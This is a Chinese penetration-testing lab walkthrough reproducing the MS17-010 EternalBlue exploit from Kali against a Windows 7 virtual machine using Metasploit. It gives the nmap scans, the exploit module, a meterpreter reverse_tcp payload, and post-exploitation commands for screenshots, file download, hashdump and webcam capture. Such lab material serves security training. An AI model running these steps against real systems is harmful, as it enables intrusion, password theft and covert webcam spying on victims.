渗透测试基础实战
实例: MS17-010
软件:Vmware Workstation 17
攻击机:Kali 靶机环境:Win7
简要介绍:
是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。 恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。
复现步骤:
步骤1:查看受害者的机器是否存活 nmap (同一网段IP地址)(1/24)可加可不加 (攻击机与靶机注要保持同一网段 使用NAT,看相互是否ping通)
全面扫描 nmap -T4 -A -v -Pn (IP地址) 1/24
步骤2:启动msf(metasploit) 命令为msfconsole
查看必备参数是否填写完。
看到 RHOSTS(攻击目标)空缺
设置攻击目标并且看是否有MS17-010目标
步骤3 搜索漏洞 命令为:search ms17-010
步骤4 使用序号为1的攻击模块
命令:use 0
步骤5 查看设置攻击负载
因为 no payload 所以要设置攻击负载
查看 设置攻击负载
命令:set payload windows/x64/meterpreter/reverse_tcp
步骤6 设置受害者IP
命令:set rhost
步骤7 设置攻击者IP
命令:set lhost
输入run进行攻击 结果会显示WIN,表示拿到权限
拿到主机shell,发现会存在一定乱码,是编码的问题
使用命令chcp 65001
补充:
936 =GBK(显示中文用的) 437=MS-DOS的默认字符集 65001=UTF-8
步骤8 屏幕快照
上传到C盘
看到快照了
从目标机中下载文件
命令 getuid——查看权限,为管理员
hashdump获取密码md5码
其他命令:
webcam_list ——查看摄像头
webcam_snap——通过摄像头拍照
webcam_stream——通过摄像头开启视频